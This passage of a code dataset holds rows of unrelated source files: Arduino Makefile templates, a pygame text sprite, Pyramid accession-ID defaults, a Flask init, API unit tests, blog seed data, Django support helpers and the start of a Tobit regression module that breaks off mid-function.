\t@$(OBJCOPY) -O ihex -R .eeprom $(AOUT) $(HEX)
$(EPP): $(AOUT)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mMemory of EEPROM\033[0m"
\t@$(OBJCOPY) -O ihex -j .eeprom --set-section-flags=.eeprom=alloc,load --no-change-warnings --change-section-lma .eeprom=0 $(AOUT) $(EPP)
size: $(AOUT)
\t@$(SIZE) $(SIZE_OPTS) $(AOUT)
$(AOUT): clear-compiler $(OBJ) $(LIB_DEPS)
\t@echo " [\033[33m\033[1mLD\033[0m] - \033[37m\033[1m$(AOUT)\033[0m"
\t@$(CXX) $(LD_FLAGS) $(LIB) $(OBJ) $(LIB_DEPS) -o $(AOUT)
%(asm_rulers)s
%(obj_rulers)s
%(libs_rulers)s
clear-compiler:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear compiler logs"
\t@rm -f compile.*
clean-tmp:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
clean-bin:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
clean:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
'''
}
| en | 0.256779 | # -*- coding: utf-8 -*- Copyright 2012 <NAME> <<EMAIL>> Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. \t@$(AR) rcs %(lib)s %(obj)s \t@echo " [\033[33m\033[1mAR\033[0m] - \033[37m\033[1m%(obj)s\033[0m to \033[37m\033[1m%(lib)s\033[0m" %(obj)s: %(source)s \t@$(CC) $(CFLAGS) $(INCLUDE) -c %(source)s -o %(obj)s 1>> compile.log 2>> compile.err \t@echo " [\033[33m\033[1mCC\033[0m] - \033[37m\033[1m%(source)s\033[0m" %(obj)s: %(source)s \t@$(AS) $(ASFLAGS) -o %(obj)s %(source)s 1>> compile.log 2>> compile.err \t@echo " [\033[33m\033[1mAS\033[0m] - \033[37m\033[1m%(source)s\033[0m" %(obj)s: %(source)s \t@$(CC) $(CFLAGS) $(INCLUDE) -c %(source)s -S -o %(obj)s 1>> compile.log 2>> compile.err \t@echo " [\033[33m\033[1mCC\033[0m] - \033[37m\033[1m%(source)s\033[0m" %(obj)s: %(source)s \t@$(CXX) $(CXXFLAGS) $(INCLUDE) -c %(source)s -o %(obj)s 1>> compile.log 2>> compile.err \t@echo " [\033[33m\033[1mCXX\033[0m] - \033[37m\033[1m%(source)s\033[0m" %(obj)s: %(source)s \t@$(CXX) $(CXXFLAGS) $(INCLUDE) -c %(source)s -S -o %(obj)s 1>> compile.log 2>> compile.err \t@echo " [\033[33m\033[1mCXX\033[0m] - \033[37m\033[1m%(source)s\033[0m" /** * Generated with sketch %(version)s **/ #include <avr/sleep.h> int main(void) { for(;;) sleep_mode(); return 0; } /** * Generated with sketch %(version)s **/ #include <Arduino.h> /** * Setup of the firmware **/ void setup() { } /** * Schedule events for firmware program **/ void loop() { delay(250); } ########################################## # Makefile generated with sketch %(version)s ########################################## # Defines of Arduino ARDUINO_HOME=%(sdk_home)s ARDUINO_CORE=$(ARDUINO_HOME)/hardware/arduino/cores ARDUINO_VARIANT=$(ARDUINO_HOME)/hardware/arduino/variants/%(variant)s # Define toolchain CC=%(cc)s CXX=%(cxx)s AS=%(asm)s LD=%(ld)s AR=%(ar)s OBJCOPY=%(objcopy)s SIZE=%(size)s AVRDUDE=%(avrdude)s PROGRAMER=%(programer)s LIB= INCLUDE=-I$(ARDUINO_CORE)/arduino -I$(ARDUINO_VARIANT) -I$(ARDUINO_CORE) -I lib/ #Define of MCU MCU=%(mcu)s CLOCK=%(clock_hz)sUL ARDUINO=%(sdk_version)s # Define compiler flags _CFLAGS=-Os -Wall -fno-exceptions -ffunction-sections -fdata-sections -mmcu=$(MCU) \\ -DF_CPU=$(CLOCK) -MMD -DARDUINO=$(ARDUINO) \\ -fpermissive -lm -Wl,-u,vfprintf -lprintf_min CFLAGS=$(_CFLAGS) -std=c99 CXXFLAGS=$(_CFLAGS) -std=c++98 ASFLAGS=-mmcu $(MCU) # Define compiler rulers OBJ=%(obj_dep)s CORE_OBJ=%(core_obj_dep)s AOUT=binary/%(project_name)s-%(mcu)s.elf HEX=binary/%(project_name)s-%(mcu)s.hex EPP=binary/%(project_name)s-%(mcu)s.epp CORE_LIB=binary/core.a LIB_DEPS=%(lib_deps)s LD_FLAGS=-Os -Wl,--gc-sections -mmcu=$(MCU) -lm AVRDUDE_OPTIONS = -p$(MCU) -c$(PROGRAMER) %(pgrextra)s -Uflash:w:$(HEX):i SIZE_OPTS=-C --mcu=$(MCU) CONFIG_EXISTS=$(shell [ -e "Makefile.config" ] && echo 1 || echo 0) ifeq ($(CONFIG_EXISTS), 1) include Makefile.config endif all: $(HEX) $(EPP) rebuild: clean all deploy: $(HEX) \t$(AVRDUDE) $(AVRDUDE_OPTIONS) $(HEX): $(EPP) \t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mFirmware\033[0m" \t@$(OBJCOPY) -O ihex -R .eeprom $(AOUT) $(HEX) 
$(EPP): $(AOUT) \t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mMemory of EEPROM\033[0m" \t@$(OBJCOPY) -O ihex -j .eeprom --set-section-flags=.eeprom=alloc,load --no-change-warnings --change-section-lma .eeprom=0 $(AOUT) $(EPP) size: $(AOUT) \t@$(SIZE) $(SIZE_OPTS) $(AOUT) $(AOUT): clear-compiler $(OBJ) $(CORE_LIB) $(LIB_DEPS) \t@echo " [\033[33m\033[1mLD\033[0m] - \033[37m\033[1m$(AOUT)\033[0m" \t@$(CXX) $(LD_FLAGS) $(LIB) $(OBJ) $(CORE_LIB) $(LIB_DEPS) -o $(AOUT) $(CORE_LIB): $(CORE_OBJ)%(core_ruler)s %(asm_rulers)s %(obj_rulers)s %(libs_rulers)s %(core_asm_rulers)s %(core_obj_rulers)s clear-compiler: \t@echo " [\033[33m\033[1mRM\033[0m] - Clear compiler logs" \trm -f compile.* clean-tmp: \t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files" \t@rm -f tmp/* clean-bin: \t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files" \t@rm -f binary/* clean: \t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files" \t@rm -f tmp/* \t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files" \t@rm -f binary/* ########################################## # Makefile generated with sketch %(version)s ########################################## # Define toolchain CC=%(cc)s CXX=%(cxx)s AS=%(asm)s LD=%(ld)s AR=%(ar)s OBJCOPY=%(objcopy)s SIZE=%(size)s AVRDUDE=%(avrdude)s PROGRAMER=%(programer)s LIB= INCLUDE=-I lib/ #Define of MCU MCU=%(mcu)s CLOCK=%(clock_hz)sUL # Define compiler flags _CFLAGS=-Os -Wall -fno-exceptions -ffunction-sections -fdata-sections -mmcu=$(MCU) \\ -DF_CPU=$(CLOCK) -fpermissive -lm -Wl,-u,vfprintf -lprintf_min CFLAGS=$(_CFLAGS) -std=c99 CXXFLAGS=$(_CFLAGS) -std=c++98 ASFLAGS=-mmcu $(MCU) # Define compiler rulers ASM=%(asm_dep)s OBJ=%(obj_dep)s LIB_DEPS=%(lib_deps)s AOUT=binary/%(project_name)s-%(mcu)s.elf HEX=binary/%(project_name)s-%(mcu)s.hex EPP=binary/%(project_name)s-%(mcu)s.epp LD_FLAGS=-Os -Wl,--gc-sections -mmcu=$(MCU) -lm AVRDUDE_OPTIONS = -p$(MCU) -c$(PROGRAMER) %(pgrextra)s -Uflash:w:$(HEX):i SIZE_OPTS=-A CONFIG_EXISTS=$(shell [ -e "Makefile.config" ] && echo 1 || echo 0) ifeq ($(CONFIG_EXISTS), 1) include Makefile.config endif all: $(HEX) $(EPP) rebuild: clean all deploy: $(HEX) \t$(AVRDUDE) $(AVRDUDE_OPTIONS) $(HEX): $(EPP) \t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mFirmware\033[0m" \t@$(OBJCOPY) -O ihex -R .eeprom $(AOUT) $(HEX) $(EPP): $(AOUT) \t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mMemory of EEPROM\033[0m" \t@$(OBJCOPY) -O ihex -j .eeprom --set-section-flags=.eeprom=alloc,load --no-change-warnings --change-section-lma .eeprom=0 $(AOUT) $(EPP) size: $(AOUT) \t@$(SIZE) $(SIZE_OPTS) $(AOUT) $(AOUT): clear-compiler $(OBJ) $(LIB_DEPS) \t@echo " [\033[33m\033[1mLD\033[0m] - \033[37m\033[1m$(AOUT)\033[0m" \t@$(CXX) $(LD_FLAGS) $(LIB) $(OBJ) $(LIB_DEPS) -o $(AOUT) %(asm_rulers)s %(obj_rulers)s %(libs_rulers)s clear-compiler: \t@echo " [\033[33m\033[1mRM\033[0m] - Clear compiler logs" \t@rm -f compile.* clean-tmp: \t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files" \t@rm -f tmp/* clean-bin: \t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files" \t@rm -f binary/* clean: \t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files" \t@rm -f tmp/* \t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files" \t@rm -f binary/* | 1.551507 | 2 |
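Each entry in the templates dict above is an old-style %-format string, so rendering a file is a single dict substitution. For example, against the dict defined above (the version string is invented):

print(templates['avr-main.cc'] % {'version': '0.9.0'})
# -> a main.cc stub whose header reads "Generated with sketch 0.9.0"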
Tic-Tac-Pi/gameObjects/TextObject.py | mstubinis/Tic-Tac-Pi | 2 | 10362 |
import pygame
from pygame.locals import *
import resourceManager
class TextObject(pygame.sprite.Sprite):
def __init__(self,pos,fontSize,fontcolor,textstring):
pygame.sprite.Sprite.__init__(self) #call Sprite initializer
self.position = pos
self.message = textstring
self.color = fontcolor
self.font = pygame.font.Font(None,fontSize)
self.text = self.font.render(self.message, 1,fontcolor)
self.rect = pygame.Rect((0,0),self.font.size(self.message))
self.rect.midtop = pos
def is_clicked(self,events):
        if self.is_mouse_over():
for event in events:
if event.type == pygame.MOUSEBUTTONDOWN:
if event.button == 1:
return True
return False
def is_mouse_over(self):
mousePos = pygame.mouse.get_pos()
if mousePos[0] < self.rect.x:
return False
if mousePos[0] > self.rect.x + self.rect.w:
return False
if mousePos[1] < self.rect.y:
return False
if mousePos[1] > self.rect.y + self.rect.h:
return False
return True
def update_message(self,message):
self.message = message
self.text = self.font.render(message, 1,self.color)
self.rect.w = self.font.size(message)[0]
self.rect.h = self.font.size(message)[1]
self.rect.midtop = self.position
def update(self):
pass
def draw(self,screen):
screen.blit(self.text, self.rect)
 | import pygame
from pygame.locals import *
import resourceManager
class TextObject(pygame.sprite.Sprite):
def __init__(self,pos,fontSize,fontcolor,textstring):
pygame.sprite.Sprite.__init__(self) #call Sprite initializer
self.position = pos
self.message = textstring
self.color = fontcolor
self.font = pygame.font.Font(None,fontSize)
self.text = self.font.render(self.message, 1,fontcolor)
self.rect = pygame.Rect((0,0),self.font.size(self.message))
self.rect.midtop = pos
def is_clicked(self,events):
        if self.is_mouse_over():
for event in events:
if event.type == pygame.MOUSEBUTTONDOWN:
if event.button == 1:
return True
return False
def is_mouse_over(self):
mousePos = pygame.mouse.get_pos()
if mousePos[0] < self.rect.x:
return False
if mousePos[0] > self.rect.x + self.rect.w:
return False
if mousePos[1] < self.rect.y:
return False
if mousePos[1] > self.rect.y + self.rect.h:
return False
return True
def update_message(self,message):
self.message = message
self.text = self.font.render(message, 1,self.color)
self.rect.w = self.font.size(message)[0]
self.rect.h = self.font.size(message)[1]
self.rect.midtop = self.position
def update(self):
pass
def draw(self,screen):
screen.blit(self.text, self.rect)
| en | 0.250797 | #call Sprite initializer | 2.851465 | 3 |
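The manual four-comparison bounds test in is_mouse_over is essentially what pygame's built-in Rect.collidepoint does (edge handling differs by one pixel at the right/bottom borders). A sketch of the shorter form, with arbitrary rectangle values:

import pygame

rect = pygame.Rect(10, 10, 100, 30)       # x, y, width, height
print(bool(rect.collidepoint((50, 20))))  # True  - point inside
print(bool(rect.collidepoint((5, 5))))    # False - point outside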
src/encoded/server_defaults.py | beta-cell-network/beta-cell-nw | 4 | 10363 | from datetime import datetime
from jsonschema_serialize_fork import NO_DEFAULT
from pyramid.security import effective_principals
from pyramid.threadlocal import get_current_request
from string import (
digits,
ascii_uppercase,
)
import random
import uuid
from snovault.schema_utils import server_default
ACCESSION_FACTORY = __name__ + ':accession_factory'
def includeme(config):
from pyramid.path import DottedNameResolver
accession_factory = config.registry.settings.get('accession_factory')
if accession_factory:
factory = DottedNameResolver().resolve(accession_factory)
else:
factory = enc_accession
config.registry[ACCESSION_FACTORY] = factory
@server_default
def userid(instance, subschema):
request = get_current_request()
principals = effective_principals(request)
for principal in principals:
if principal.startswith('userid.'):
return principal[7:]
return NO_DEFAULT
@server_default
def now(instance, subschema):
# from jsonschema_serialize_fork date-time format requires a timezone
return datetime.utcnow().isoformat() + '+00:00'
@server_default
def uuid4(instance, subschema):
return str(uuid.uuid4())
@server_default
def accession(instance, subschema):
if 'external_accession' in instance:
return NO_DEFAULT
request = get_current_request()
factory = request.registry[ACCESSION_FACTORY]
    # 3 digits x 3 uppercase letters: 10**3 * 26**3 = 17,576,000 possible random parts
ATTEMPTS = 10
for attempt in range(ATTEMPTS):
new_accession = factory(subschema['accessionType'])
if new_accession in request.root:
continue
return new_accession
raise AssertionError("Free accession not found in %d attempts" % ATTEMPTS)
ENC_ACCESSION_FORMAT = (digits, digits, digits, ascii_uppercase, ascii_uppercase, ascii_uppercase)
def enc_accession(accession_type):
random_part = ''.join(random.choice(s) for s in ENC_ACCESSION_FORMAT)
return 'D' + accession_type + random_part
TEST_ACCESSION_FORMAT = (digits, ) * 6
def test_accession(accession_type):
""" Test accessions are generated on test.encodedcc.org
"""
random_part = ''.join(random.choice(s) for s in TEST_ACCESSION_FORMAT)
return 'D' + accession_type + random_part
| from datetime import datetime
from jsonschema_serialize_fork import NO_DEFAULT
from pyramid.security import effective_principals
from pyramid.threadlocal import get_current_request
from string import (
digits,
ascii_uppercase,
)
import random
import uuid
from snovault.schema_utils import server_default
ACCESSION_FACTORY = __name__ + ':accession_factory'
def includeme(config):
from pyramid.path import DottedNameResolver
accession_factory = config.registry.settings.get('accession_factory')
if accession_factory:
factory = DottedNameResolver().resolve(accession_factory)
else:
factory = enc_accession
config.registry[ACCESSION_FACTORY] = factory
@server_default
def userid(instance, subschema):
request = get_current_request()
principals = effective_principals(request)
for principal in principals:
if principal.startswith('userid.'):
return principal[7:]
return NO_DEFAULT
@server_default
def now(instance, subschema):
# from jsonschema_serialize_fork date-time format requires a timezone
return datetime.utcnow().isoformat() + '+00:00'
@server_default
def uuid4(instance, subschema):
return str(uuid.uuid4())
@server_default
def accession(instance, subschema):
if 'external_accession' in instance:
return NO_DEFAULT
request = get_current_request()
factory = request.registry[ACCESSION_FACTORY]
    # 3 digits x 3 uppercase letters: 10**3 * 26**3 = 17,576,000 possible random parts
ATTEMPTS = 10
for attempt in range(ATTEMPTS):
new_accession = factory(subschema['accessionType'])
if new_accession in request.root:
continue
return new_accession
raise AssertionError("Free accession not found in %d attempts" % ATTEMPTS)
ENC_ACCESSION_FORMAT = (digits, digits, digits, ascii_uppercase, ascii_uppercase, ascii_uppercase)
def enc_accession(accession_type):
random_part = ''.join(random.choice(s) for s in ENC_ACCESSION_FORMAT)
return 'D' + accession_type + random_part
TEST_ACCESSION_FORMAT = (digits, ) * 6
def test_accession(accession_type):
""" Test accessions are generated on test.encodedcc.org
"""
random_part = ''.join(random.choice(s) for s in TEST_ACCESSION_FORMAT)
return 'D' + accession_type + random_part
| en | 0.510727 | # from jsonschema_serialize_fork date-time format requires a timezone # With 17 576 000 options Test accessions are generated on test.encodedcc.org | 1.962412 | 2 |
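The 17,576,000 figure in the accession retry loop falls straight out of ENC_ACCESSION_FORMAT: three decimal digits followed by three uppercase letters. A quick verification plus a sample call against the functions above (the 'AB' accession type is made up):

print(10 ** 3 * 26 ** 3)    # 17576000 distinct random parts
print(enc_accession('AB'))  # e.g. 'DAB042QZX': 'D' + type + 3 digits + 3 letters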
app/__init__.py | geirowew/SapAPI | 1 | 10364 |
from flask import Flask
#from config import Config
import config
app = Flask(__name__)
#app.config.from_object(Config)
app.config.from_object(config)
#from app import routes
from app import gettoken | from flask import Flask
#from config import Config
import config
app = Flask(__name__)
#app.config.from_object(Config)
app.config.from_object(config)
#from app import routes
from app import gettoken | en | 0.138415 | #from config import Config #app.config.from_object(Config) #from app import routes | 1.745832 | 2 |
todo/task/__init__.py | BenMcLean981/flask-todo | 0 | 10365 | """Todo module."""
| """Todo module."""
| es | 0.59867 | Todo module. | 0.969902 | 1 |
src/pvt_model/pvt_system/pipe.py | BenWinchester/PVTModel | 1 | 10366 |
#!/usr/bin/python3.7
########################################################################################
# pvt_collector/pipe.py - Represents a pipe within the system.
#
# Author: <NAME>
# Copyright: <NAME>, 2021
########################################################################################
"""
The pipe module for the PV-T model.
This module represents a pipe within the PV-T system.
"""
from dataclasses import dataclass
__all__ = ("Pipe",)
@dataclass
class Pipe:
"""
Represents a pipe within the PVT system.
.. attribute:: temperature
The temperature of the pipe, measured in Kelvin.
"""
temperature: float
 | #!/usr/bin/python3.7
########################################################################################
# pvt_collector/pipe.py - Represents a pipe within the system.
#
# Author: <NAME>
# Copyright: <NAME>, 2021
########################################################################################
"""
The pipe module for the PV-T model.
This module represents a pipe within the PV-T system.
"""
from dataclasses import dataclass
__all__ = ("Pipe",)
@dataclass
class Pipe:
"""
Represents a pipe within the PVT system.
.. attribute:: temperature
The temperature of the pipe, measured in Kelvin.
"""
temperature: float
| de | 0.32294 | #!/usr/bin/python3.7 ######################################################################################## # pvt_collector/pipe.py - Represents a pipe within the system. # # Author: <NAME> # Copyright: <NAME>, 2021 ######################################################################################## The pipe module for the PV-T model. This module represents a pipe within the PV-T system. Represents a pipe within the PVT system. .. attribute:: temperature The temperature of the pipe, measured in Kelvin. | 2.67348 | 3 |
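Because Pipe is a @dataclass, the single field declaration above provides the constructor, repr and field-wise equality for free. For instance, with an arbitrary temperature in Kelvin:

hot = Pipe(temperature=353.15)
print(hot)                              # Pipe(temperature=353.15)
print(hot == Pipe(temperature=353.15))  # True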
tests/test_api_account_state.py | luisparravicini/ioapi | 0 | 10367 | import unittest
import os
import json
import requests
import requests_mock
from ioapi import api_url, IOService, AuthorizationError, UnexpectedResponseCodeError
class APIAccountStateTestCase(unittest.TestCase):
def setUp(self):
self.service = IOService()
@requests_mock.mock()
def test_account_state_without_auth(self, mock):
data = self._read_mock_response('account_state_without_auth')
self._setup_response(mock, data, 401)
with self.assertRaises(AuthorizationError):
self.service.get_account_state()
@requests_mock.mock()
def test_account_state_auth_not_ok(self, mock):
data = self._read_mock_response('account_state_not_ok')
for code in range(201, 600):
# skip 401 status code (unauthorized)
if code == 401:
continue
self._setup_response(mock, data, code)
with self.assertRaises(UnexpectedResponseCodeError) as cm:
self.service.get_account_state()
self.assertEqual(cm.exception.status_code, code)
@requests_mock.mock()
def test_account_state(self, mock):
data = self._read_mock_response('account_state')
self.service = IOService()
self._setup_response(mock, data)
self.assertEqual(self.service.get_account_state(), data)
self.fail("auth missing")
def _read_mock_response(self, name):
path = os.path.join(os.path.dirname(__file__), name + '.json')
with open(path, 'r') as file:
data = json.loads(file.read())
return data
def _setup_response(self, mock, response, code=None):
if code is None:
code = requests.codes.ok
mock.get(
self.service.api + api_url.URL_ACCOUNT_STATE,
json=response,
status_code=code)
| import unittest
import os
import json
import requests
import requests_mock
from ioapi import api_url, IOService, AuthorizationError, UnexpectedResponseCodeError
class APIAccountStateTestCase(unittest.TestCase):
def setUp(self):
self.service = IOService()
@requests_mock.mock()
def test_account_state_without_auth(self, mock):
data = self._read_mock_response('account_state_without_auth')
self._setup_response(mock, data, 401)
with self.assertRaises(AuthorizationError):
self.service.get_account_state()
@requests_mock.mock()
def test_account_state_auth_not_ok(self, mock):
data = self._read_mock_response('account_state_not_ok')
for code in range(201, 600):
# skip 401 status code (unauthorized)
if code == 401:
continue
self._setup_response(mock, data, code)
with self.assertRaises(UnexpectedResponseCodeError) as cm:
self.service.get_account_state()
self.assertEqual(cm.exception.status_code, code)
@requests_mock.mock()
def test_account_state(self, mock):
data = self._read_mock_response('account_state')
self.service = IOService()
self._setup_response(mock, data)
self.assertEqual(self.service.get_account_state(), data)
self.fail("auth missing")
def _read_mock_response(self, name):
path = os.path.join(os.path.dirname(__file__), name + '.json')
with open(path, 'r') as file:
data = json.loads(file.read())
return data
def _setup_response(self, mock, response, code=None):
if code is None:
code = requests.codes.ok
mock.get(
self.service.api + api_url.URL_ACCOUNT_STATE,
json=response,
status_code=code)
| en | 0.763347 | # skip 401 status code (unauthorized) | 2.69041 | 3 |
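The tests above register canned responses via requests-mock's decorator form; the same library also works as a context manager, which is handy for one-off checks. A standalone sketch with an invented URL:

import requests
import requests_mock

with requests_mock.Mocker() as m:
    m.get('https://api.example.test/state', json={'ok': True}, status_code=200)
    resp = requests.get('https://api.example.test/state')
    print(resp.status_code, resp.json())  # 200 {'ok': True}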
testData/devSeedData.py | bgporter/wastebook | 0 | 10368 | '''
fake posts to bootstrap a development database. Put any interesting cases
useful for development in here.
'''
from datetime import datetime
POST_DATA_1 = [
{
"created" : datetime(2015, 10, 1),
"published": datetime(2015, 10, 1),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "First Post",
"slug": "",
"text": "a bunch of words #foo #bar",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": False,
"status": "published",
"title": "Second Post",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": False,
"status": "draft",
"title": "Third Post",
"slug": "",
"text": "This is a #draft #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "draft",
"title": "Fourth Post",
"slug": "",
"text": "This is a #draft #post",
"tags": [],
"type": "Post"
},
]
POST_DATA_2 = [
{
"created" : datetime(2015, 3, 2),
"published": datetime(2015, 3, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 1",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 4, 2),
"published": datetime(2015, 4, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 2",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 5, 2),
"published": datetime(2015, 5, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 3",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 5, 2),
"published": datetime(2015, 5, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 4",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 6, 2),
"published": datetime(2015, 6, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 5",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 6, 2),
"published": datetime(2015, 6, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 6",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 6, 2),
"published": datetime(2015, 6, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 7",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 7, 2),
"published": datetime(2015, 7, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 8",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 8, 2),
"published": datetime(2015, 8, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 9",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 9, 2),
"published": datetime(2015, 9, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 10",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 11",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
]
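# Example (added for illustration, not part of the original module): how this
# fixture data might be filtered before seeding a development database.
# POST_DATA_1 and POST_DATA_2 are the lists defined above.
if __name__ == '__main__':
    all_posts = POST_DATA_1 + POST_DATA_2
    visible = [p for p in all_posts
               if p["public"] and p["status"] == "published"]
    drafts = [p for p in all_posts if p["status"] == "draft"]
    print("{} public published posts, {} drafts".format(len(visible), len(drafts)))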
customer_support/utils.py | rtnpro/django-customer-support | 1 | 10369 | from __future__ import absolute_import
from django.template.loader import render_to_string
import simplejson
import datetime
from django.http import HttpResponse
class GenericItemBase(object):
ITEM_ATTRS = []
def __init__(self, identifier):
self.identifier = identifier
def jsonify(self, value):
"""
Method to convert non JSON serializable objects into
an equivalent JSON serializable form.
"""
return value
def json(self):
raise NotImplementedError
def render_json(self):
raise NotImplementedError
def render_html(self):
raise NotImplementedError
class GenericItem(GenericItemBase):
TEMPLATE = 'customer_support/item.html'
def __init__(self, *args, **kwargs):
super(GenericItem, self).__init__(*args, **kwargs)
self._item = {}
def get_item(self, identifier):
raise NotImplementedError
def set_item(self, data):
self._item = {}
for key, value in data.items():
if key in self.ITEM_ATTRS:
self._item[key] = value
def json(self):
item = {}
for attr_name in self.ITEM_ATTRS:
attr = self.jsonify(self._item[attr_name])
            if isinstance(attr, datetime.datetime):  # the datetime module was imported, not the class
attr = attr.strftime('%Y-%m-%d %H:%M')
item[attr_name] = attr
return simplejson.dumps(item)
def render_json(self):
return HttpResponse(
            self.json(), content_type='application/json')
def render_html(self):
        # render_to_string returns an HTML string; shortcuts.render would need a request object
        return render_to_string(self.TEMPLATE, {'item': self._item})
class GenericItems(GenericItemBase):
TEMPLATE = 'customer_support/items.html'
def __init__(self, *args, **kwargs):
        super(GenericItems, self).__init__(*args, **kwargs)
self._items = []
def get_items(self, for_entity):
raise NotImplementedError
def set_items(self, items):
self._items = items
def json(self):
items = []
for item in self._items:
item_dict = {}
for attr_name in self.ITEM_ATTRS:
attr = self.jsonify(item[attr_name])
                if isinstance(attr, datetime.datetime):
attr = attr.strftime('%Y-%m-%d %H:%M')
item_dict[attr_name] = attr
            items.append(item_dict)  # append the serialized dict, not the raw item
return simplejson.dumps(items)
def render_json(self):
return HttpResponse(
            self.json(), content_type='application/json')
def render_html(self):
        return render_to_string(self.TEMPLATE, {'items': self._items})
class GenericActions(object):
def __init__(self, item_id):
self.item_id = item_id
self.actions = []
def get_actions_for_item(self):
raise NotImplementedError
def json(self):
return simplejson.dumps(self.actions)
def render_json(self):
        return HttpResponse(self.json(), content_type='application/json')
def render_html(self):
        pass
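# Example (illustrative sketch, not part of the original module): a concrete
# subclass wiring GenericItem to real data. "Ticket" and its fields are
# hypothetical; get_item would normally query a model or an external service.
class TicketItem(GenericItem):
    TEMPLATE = 'customer_support/item.html'
    ITEM_ATTRS = ['title', 'status', 'created']

    def get_item(self, identifier):
        data = {
            'title': 'Printer on fire',
            'status': 'open',
            'created': datetime.datetime(2015, 10, 1),
        }
        self.set_item(data)
        return self._item

# TicketItem('ticket-1').get_item('ticket-1') yields a dict ready for json()
# or render_html().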
tobit.py | AlvaroCorrales/tobit | 1 | 10370 | import math
import warnings
import numpy as np
import pandas as pd
from scipy.optimize import minimize
import scipy.stats
from scipy.stats import norm # edit
from scipy.special import log_ndtr
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error, mean_absolute_error
def split_left_right_censored(x, y, cens):
counts = cens.value_counts()
if -1 not in counts and 1 not in counts:
warnings.warn("No censored observations; use regression methods for uncensored data")
xs = []
ys = []
for value in [-1, 0, 1]:
if value in counts:
split = cens == value
y_split = np.squeeze(y[split].values)
x_split = x[split].values
else:
y_split, x_split = None, None
xs.append(x_split)
ys.append(y_split)
return xs, ys
def tobit_neg_log_likelihood(xs, ys, params):
x_left, x_mid, x_right = xs
y_left, y_mid, y_right = ys
b = params[:-1]
# s = math.exp(params[-1])
s = params[-1]
to_cat = []
cens = False
if y_left is not None:
cens = True
left = (y_left - np.dot(x_left, b))
